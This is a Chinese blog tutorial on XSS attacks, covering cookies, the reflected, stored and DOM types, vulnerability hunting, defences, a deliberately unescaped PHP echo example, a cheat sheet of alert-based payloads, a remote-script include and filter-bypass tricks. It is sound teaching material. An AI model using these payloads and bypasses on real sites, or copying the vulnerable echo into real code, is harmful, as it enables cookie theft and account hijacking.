网络安全进阶学习第二课——XSS跨站脚本攻击

已于 2023-07-01 22:59:55 修改
阅读量2k 收藏 2
点赞数 1
分类专栏: web安全 文章标签: web安全 xss
于 2023-06-17 19:37:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p36273/article/details/131263698
版权

文章目录

一、前端安全

1、什么是前端安全

首先了解什么是前端。前端从定义上来讲是指一个网站的前台部分,是展示给用户看的部分。它不需要关注任何业务之间的逻辑处理,只需要安安静静地做好自己,老老实实的把自己最美的一面展示给用户。

2、什么是Cookie

Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。无论何时用户链接到服务器,Web 站点都可以访问 Cookie 信息 。

Cookie 是临时的或者是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间。

持续的 Cookie 则保存在用户的 Cookie 文件中,下一次用户返回时,仍然可以对它进行调用。在 Cookie 文件中保存 Cookie,有些用户担心 Cookie 中的用户信息被一些别有用心的人窃取,而造成一定的损害。其实,网站以外的用户无法跨过网站来获得 Cookie 信息。如果因为这种担心而屏蔽 Cookie,肯定会因此拒绝访问许多站点页面。因为,当今有许多 Web 站点开发人员使用 Cookie 技术,例如 Session 对象的使用就离不开 Cookie 的支持。

3、Cookie的功能

服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。Cookies最典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功用。另一个重要应用场合是“购物车”之类处理。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写入Cookies,以便在最后付款时提取信息。

4、Cookie的生命周期

Cookie可以保持登录信息到用户下次与服务器的会话,换句话说,下次访问同一网站时,用户会发现不必输入用户名和密码就已经登录了(当然,不排除用户手工删除Cookie)。而还有一些Cookie在用户退出会话的时候就被删除了,这样可以有效保护个人隐私。

Cookie在生成时就会被指定一个Expire值,这就是Cookie的生存周期,在这个周期内Cookie有效。

5、常用的查看cookie插件

Cookie Quick Manager

6、XSS攻击能做什么

劫持cookie,模拟用户操作,钓鱼

二、常被利用的前端代码

1. <script>Javascript的内容</script>

2. 弹框函数:
alert(“文本”)       #只有一个确定的提示框
confirm(“文本”)   #拥有确定和取消的提示框
prompt(“文本”, “默认值”) #可以输入文字的框

3. JavaScript中的事件
<a href=“demo.html” 事件="alert('1');">test</a>
事件:
onmouseover:鼠标移入目标元素上方。鼠标移到其后代元素上时会触发。
onmouseout:鼠标移出目标元素上方。
onmouseenter:鼠标移入元素范围内触发,该事件不冒泡
onmouseleave:鼠标移出元素范围时触发,该事件不冒泡

4. <img src="" onerror=JS代码”/>
src:图片的来源,必写属性;
当图片加载失败时触发onerror的事件;

三、JavaScript中常见的对象

Document:
document.cookie返回cookie的值
document.location.href 跳转至某个页面
document.write 在页面中写入

String:
indexOf 返回某个指定的字符串值在字符串中首次出现的位置
对大小写敏感,没有发现时返回-1
length 返回字符串的长度

四、XSS原理

XSS又叫CSS(Cross Site Script),跨站脚本攻击。因为与html中的css样式同,所以称之为XSS。在OWASP top 10 2013年度中排第三名,在OWASP top 10 2017年度中排第7名。

属于web应用中计算机安全漏洞,是恶意的web访问者将脚本植入到提供给用户使用的页面中,通常是使用JavaScript编写的危险代码,当用户使用浏览器访问页面时,脚本会被执行,从而达到攻击者目的。

XSS攻击最终目的是在网页中嵌入客户端恶意代码,最常用的攻击代码是JavaScript语言,但也会使用其他的脚本语言,例如:ActionScript、VBScript。而如今的互联网客户端脚本基本上是基于JavaScript,所以如果想要深入研究XSS,必须要精通JavaScript。

XSS换句话说,JavaScript能够到什么效果,XSS的胃里就有多大。这完全不是危言耸听。JavaScript可以用于获取用户的cookie,弹出窗口,那么存在XSS漏洞的网站,XSS就可以用来盗取用户cookie,废掉页面,导航到恶意网站!更高端的XSS代码完全可以进行监控你的键盘操作,模仿windows注销界面,诱导你输入开机密码!而攻击者需要做的仅仅是向你的代码中注入JavaScript代码!

五、XSS危害

  1. 网站弹框(刷流量)
  2. 网站挂马
  3. 会话劫持
  4. Cookie被盗取
  5. 用户提权
  6. 账号被盗
  7. 尽量DDOS
  8. 蠕虫攻击

六、作为一名渗透人员(黑客)如何去挖掘XSS漏洞?

  1. 寻找注入点,数据有交互的地方(搜索框、留言板)
  2. 根据测试流程首先实验一些特殊符号的输入。发现可以正常输出,说明后台并没有进行相关的过滤。例子:'<>?"&/6666
  3. 如果有过滤则进行相关的绕过。

七、XSS的分类与利用

1、XSS实验常用语句

<script>alert(1)</script>

2、反射型(非持续型)

反射型跨站脚本也称作非持久型、参数型跨站脚本。主要用于将恶意脚本附加到URL地址的参数中。

产生层面:前端
漏洞特征:一次性的、前端执行、不会储存在后端数据库
危害等级:中
注意:在黑客眼中,这个实际上没啥用,就是自己骗自己,影响只对自己有用,对其他人没效果。

原理

  1. 构造一个后端php文件( xss.php ):

    <?php $name=$_GET['name’]; echo"welcome $name"; ?>

  2. 前端访问这个xss.php页面,并使用name参数进行数据传递,数据值为2。
    例如在浏览器url栏输入:ip地址/xss.php?name=2

  3. 前端识别数据执行代码返回页面。
    数据交互过程:用户输入数据->后端执行php->返回数据给前端并执行(回显)

  4. 插入一个恶意js脚本()
    例如在浏览器url栏输入:
    ip地址/xss.php?name=

  5. 返回的代码并执行了

3、存储型(持续型)

此类XSS不需要用户单击特定URL就能执行跨站脚本。

攻击者事先将恶意JavaScript代码上传或存储到漏洞服务器中。

当受害者浏览包含此恶意JavaScript代码的页面就会执行恶意代码。

产生层面:后端
漏洞特征:持久性的、前端执行、储存在后端数据库
危害等级:高

3.1、交互原理:

用户输入数据->后端执行php代码->存入数据库某张表->返回数据给php页面->回显前端

3.2、数据库查看

die()				//函数输出一条消息,并退出当前脚本
trim()               //函数从字符串的两端删除空白字符和其他预定义字符
stripslashes()          	//删除反斜杠
mysql_real_escape_string()  //转义 SQL 语句中使用的字符串中的特殊字符
mysql_query(query)       //mysql_query() 函数执行一条 MySQL 查询
mysql_error()			//返回上一个 MySQL 操作产生的文本错误信息
use dvwa;
show tables;
select * from guestbook;
delete from guestbook where comment_id=1;

4、DOM型

XSS原理客户端的脚本程序可以通过DOM动态地检查和修改页面内容。

程序执行不依赖于服务器端的数据,从客户端获得DOM中的数据并在本地执行。

浏览器用户可以操纵DOM中的一些对象,例如URL、location等。

用户在客户端输入的数据如果包含了恶意JavaScript脚本,而这些脚本没有经过适当的过滤和消毒,应用程序就可能受到基于DOM的XSS攻击。

产生层面:前端、特殊的反射型XSS
漏洞特征:一次性的、前端执行、不会储存在后端数据库
危害等级:中

八、XSS漏洞绕过方法

1、XSS常见语句

1.1、常见XSS语句标签,<script>
1<script>alert(1)</script>
2<script src=http://baidu.cn/xss/xss.js></script>
3)‘><script>alert(1)</script>

1.2、常见XSS语句标签,<img>
1<img src=x onerror=alert(/xss/)>
2<img src=javascript:alert(1)>//版本,E7.0|IE6.0,才能执行
3<img src=# onmouseover="alert(1)">

1.3、常见XSS语句标签,<input>
1<input onclick=alert(360)>
2<input onfocus="alert('xss');">
3<input onblur=alert("xss") autofocus><input autofocus>离开竞争焦点,从而触发onblur事件

1.4XSS 闭合标签
1)'><script>alert(1)</script>
2</script><script>alert(1)</script>

2、XSS漏洞绕过方法

1)大小写绕过	  		<ScRiPt>alert(1)</ScRiPt>
2)双写绕过		  	<sc<script>ript>alert(/xss/)</script>
3)反引号绕过			`` 绕过单双引号的过滤
4)关闭标签(利用<>关闭标签)          "> <script>alert(1)</script>
5)超链接标签			< a href= > 1 </ a>
6)图片链接绕过			< img src=1 onerror=alert(1)>
7)编码绕过(八进制、十进制、十六进制编码、html实体编码、url编码、base64) 
8)空格、回车、换行符、tab、混淆
..................

九、XSS漏洞之防御

1、防御手段

  1. CSP内容安全策略
  2. HttpOnly
  3. 输入输出检查

2、防御函数(PHP)

1trim()
//函数从字符串的两端删除空白字符和其他预定义字符

2stripslashes()
//删除反斜杠

3substr_replace(st1,st2,n) 
//str1 为原始字符串,str2为替换的字符串,n代表替换位置,第n位之后替换

4addslashes() 
//在预定义字符之前添加反斜杠的字符串

5strip_tags()
//剥去字符串中的 HTML、XML 以及 PHP 的标签

6htmlspecialchars()
//把预定义的字符转换为 HTML 实体

7preg_replace($mode,$replacement,$str [,int limit 匹配多少次])
//查找和替换子字符串(类似str_replace)
..................

十一、具体靶场例子

链接: pikache靶场通关——XSS漏洞

p36273
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
跨站脚本攻击(XSS)进阶
悦分享
07-08 315
跨站脚本攻击XSS)是客户端脚本安全中的头号大敌。OWASP TOP 10威胁多次把XSS列在榜首。跨站脚本攻击,英文全称是 Cross Site Script,本来缩写是 CS S,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“跨站脚本”。
网络安全】——客户端安全(浏览器安全XSS、CSRF、Clickjacking)
Veeupup博客
04-12 595
学习总结客户端安全的相关要素,包括浏览器安全跨站脚本攻击XSS),跨站点请求伪造(CSRF),点击劫持(Clickjacking),HTML5安全等。
XSS跨站脚本攻击(1)
weixin_48712514的博客
05-12 211
~~XSS概述 通过将精心构造的代码(js)注入到网⻚中,并器解释运行这段JS 代码,以达到恶意的效果。当用户访问被XSS 脚本注入过的网⻚,XSS 脚本就会被提取出来,用户浏览器就会解析执行这段代码,也就是说用户被攻击XSS漏洞验证 SWASP TOP 10安全之一 aelert(/xss/); 英文名:饿乐得 confirm('xss'); 英文名:肯风 prompt('xss'); 英文名: <script>aelert(/x
防御XSS的七条原则
收集盒 Book box
09-06 1021
前言 author: shineforyou 本文将会着重介绍防御XSS攻击的一些原则,需要读者对于XSS有所了解,至少知道XSS漏洞的基本原理,如果您对此不是特别清楚,请参考这两篇文章:《Stored and Reflected XSS Attack》《DOM Based XSS攻击者可以利用XSS漏洞向用户发送攻击脚本,而用户的浏览器因为没有办法知道这段脚本是不可信的,所以依
XSS(跨域脚本攻击
m0_52244931的博客
10-23 3982
XSS(跨域脚本go攻击
XSS脚本注入攻击
不忘初心,护天下安全!
11-23 1万+
XSS攻击 参考:https://www.freebuf.com/column/154178.html 不同于大多数攻击(一般只涉及攻击者和受害者),XSS涉及到三方,即攻击者、客户端与网站。XSS攻击目标是为了盗取客户端的cookie或者其他网站用于识别客户端身份的敏感信息。获取到合法用户的信息后,攻击者甚至可以假冒最终用户与网站进行交互。 XSS漏洞成因是由于动态网页的Web应用对用户...
XSS攻击(全站跨站脚本攻击
bai_L的博客
05-25 298
XSS介绍 XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被骇客用来编写危害性更大的网络钓鱼(Phishing)攻击而变得广为人知。对于跨站脚本攻击,骇客界共识是:跨站脚本攻击是新型的“缓冲区溢出攻击“,而JavaScript是新型的“ShellCode”. XSS成因: 对于用户输入没有严格
WEB漏洞篇——跨站脚本攻击XSS
m0_56634355的博客
06-05 4719
目录一、XSS简述1.1 什么是XSS1.2 XSS分类1.3 DOM XSS漏洞演示二、XSS攻击进阶2.1 初探XSS Payload2.2 强大的XSS Payload2.3 XSS攻击平台2.4 XSS Worm2.5 XSS构造技巧2.6 反射型XSS利用技巧-回旋镖2.7 Flash XSS2.8 JavaScript开放框架三、XSS防御3.1 HttpOnly3.2 输入检查3.3 输出检查3.4 正确地防御XSS3.5 处理富文本3.6 防御DOM Based XSS四、总结XSS攻击是指
Web 前端进阶—— Http 和数据结构 学习笔记
最新发布
cccloveforever的博客
04-22 687
http 传输的数据都是未加密的,也就是明文的,网景公司设置了 SSL 协议来对 http 协议 传输的数据进行加密处理,简单来说 https 协议是由 http 和 ssl 协议构建的可进行加密传 输和身份认证的网络协议,比 http 协议的安全性更高。https: 是以安全为目标的 HTTP 通道,简单讲是 HTTP 的安全版,即 HTTP 下加入 SSL 层,HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。http 的连接很简单,是无状态的;
网络安全渗透
weixin_65908240的博客
04-06 1139
1. Nmap的基本 Nmap + ip 6+ ip Nmap -A 开启操作系统识别和版本识别功能 – T(0-6档) 设置扫描的速度 一般设置T4 过快容易被发现 -v 显示信息的级别,-vv显示更详细的信息 192.168.1.1/24 扫描C段 192.168.11 -254 =上 nmap -A -T4 -v -iL ~/targets.txt (iL表示要扫描的目标位于一个文档中) --------------- 192.168.1.1/24 --exclu...
ctfshow XSS专题
会下雪的晴天
01-02 2708
title: ctfshow XSS专题 date: 2020-12-21 23:09:00 categories: ctfshow link:https://yq1ng.github.io/ 因为我不太会xss,所以写的可能不是很顺畅,也会罗嗦一点,师傅们轻喷 XSS预备知识 0x00 什么是xss? 0x01 xss危害 0x02 xss三种分类 web316 web317 | 318 | 319 web320 | 321 | 323 | 324 | 325 | 326 web322 小总.
XSS跨站脚本攻击
金色%夕阳的博客
04-13 4804
XSS跨站脚本攻击 1. 引入 炸诈骗短信-----利用的是人性的弱点构造的恶意链接 人性的弱点----贪婪 恶意链接之后后会进行跳转,从而导致数据的丢失 2. XSS注入漏洞的简介 1. 什么是XSS漏洞 英文全称:Cross Site Scripting.层叠样式表CSS,层叠样式表出现在XSS漏洞之前,为了避免混淆所以改名为XSS 中文名称:跨站脚本攻击XSS注入漏洞 2. 如何进行攻击呢 恶意攻击者向web前端插入恶意的前端代码(核心是javascript代码),当用户浏览该网页 时,嵌入其中
简单易懂的XSS(跨站脚本攻击)
weixin_47204991的博客
10-29 1903
跨站脚本(简称为XSS或跨站脚本跨站脚本攻击)是针对Web应用程序的安全漏洞攻击,允许用户插入恶意的脚本,从而当用户浏览网页时,插入的脚本就会执行。从而达到攻击的目的。 1.反射型XSS 反射型XSS又叫非持久性XSS,反射型XSS注入的恶意代码不会保存在服务器端,需要欺骗用户去点击恶意链接才能攻击成功。一般通过XSS来窃取用户的cookie。 反射型XSS攻击流程: 2.存储型XSS 存储型XSS又叫持久型XSS攻击脚本会永久存储在目标服务器中。例如在个人信息或者留言板之类的地方插入恶意脚本,用户访
XSS - 跨站脚本攻击
m0_50818626的博客
05-26 1259
存储型XSS又被称为持久性XSS,存储型XSS是最危险的一种跨站脚本。允许用户存储数据的WEB应用程序都可能会出现存储型XSS漏洞,当攻击者提交一段XSS代码后,被服务器端接收并存储,当再次访问页面时,这段XSS代码被程序读取响应给浏览器,造成XSS跨站攻击,这就是存储型XSS。在测试是否存在XSS时,首先要确定输入点与输出点,例如:我们要在留言内容上测试XSS漏洞,首先就要去寻找留言内容输出(显示)的地方是在标签内还是标签属性内,或者在其他地方,如果输出的数据在属性内,那么XSS是不会被执行的。
全网最详细 XSS 跨站脚本攻击,不是过来打死我!!
liuhyusb的博客
06-21 2701
​。
跨站脚本攻击XSS
凉茶铺的博客
07-26 5997
XSS,为不和层叠样式表(CascadingStyleSheets,CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。在一开始的时候,这种攻击的演示案例是跨域的,所以叫"跨站脚本"。但是发展到今天,由于JavaScript的强大功能基于网站前端应用的复杂化,是否跨域已经不再重要。但是由于历史原因,XSS这个名字一直保留下来。(2)页面展示...
xss跨站脚本攻击
weixin_46476861的博客
03-22 3276
了解xss 定义:恶意攻击者往Web页面里插入恶意的Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss攻击流程图 演示原因 xss分类 漏洞等级:中危漏洞 漏洞等级:高危漏洞 漏洞等级:低危漏洞 存在的地方 XSS测试方法 火狐用法: xss实战 ...
网络安全——XSS跨站脚本攻击
weixin_54055099的博客
09-16 4323
XSS跨站脚本攻击,DVWA靶机的三种类型三个等级的操作
网络安全-跨站脚本攻击(XSS)的原理、攻击及防御
热门推荐
关注网络安全、云原生安全
08-01 4万+
所用工具 Google出品:开源Web App漏洞测试环境:Firing Range 简介 跨站脚本攻击(全称Cross Site Scripting,为和CSS(层叠样式表)区分,简称为XSS)是指恶意攻击者在Web页面中插入恶意Script代码,当用户浏览网页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss攻击客户端,最终受害者是用户,网站管理员也是用户之一。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值